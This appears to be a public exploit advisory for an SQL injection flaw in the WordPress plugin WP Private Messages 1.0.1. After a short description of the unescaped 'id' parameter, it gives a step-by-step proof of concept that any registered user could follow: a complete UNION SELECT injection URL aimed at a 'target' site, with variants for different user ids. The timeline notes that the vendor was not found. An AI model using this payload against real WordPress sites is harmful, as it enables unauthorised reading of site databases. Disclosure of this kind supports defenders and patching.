42 lines
No EOL
1.2 KiB
Text
42 lines
No EOL
1.2 KiB
Text
# Exploit Title: WP Private Messages 1.0.1 – Plugin WordPress – Sql Injection
|
||
# Exploit Author: Lenon Leite
|
||
# Vendor Homepage: https://wordpress.org/plugins/wp-private-messages/
|
||
|
||
# Software Link: https://wordpress.org/plugins/wp-private-messages/
|
||
# Contact: http://twitter.com/lenonleite
|
||
# Website: http://lenonleite.com.br/
|
||
# Category: webapps
|
||
# Version: 1.0.1
|
||
# Tested on: Ubuntu 14.04
|
||
|
||
1 - Description:
|
||
|
||
Type user access: registered user.
|
||
$_GET[‘id’] is not escaped. Url is accessible for every registered user.
|
||
|
||
http://lenonleite.com.br/en/blog/2016/12/16/wp-private-messages-1-0-1-plugin-wordpress-sql-injection/
|
||
|
||
2 - Proof of Concept:
|
||
|
||
1 – Login as regular user (created using wp-login.php?action=register):
|
||
|
||
2 -Using :
|
||
|
||
http://target/wp-admin/users.php?page=wp-private-messages%2Fwpu_private_messages.php&wpu=readid=0+UNION+SELECT+1,2,2,name,slug,6,7,8,9,10,11,12+FROM+wp_terms+WHERE++term_id%3D1&r=recieved
|
||
|
||
Obs: Use id number of your user in third column after word select. For example:
|
||
|
||
…UNION+SELECT+1,2,1,name,slug…
|
||
|
||
…UNION+SELECT+1,2,2,name,slug…
|
||
|
||
…UNION+SELECT+1,2,3,name,slug…
|
||
|
||
…UNION+SELECT+1,2,4,name,slug…
|
||
|
||
…UNION+SELECT+1,2,5,name,slug…
|
||
|
||
3 - Timeline:
|
||
|
||
12/12/2016 – Discovered
|
||
13/12/2016 – Vendor not finded |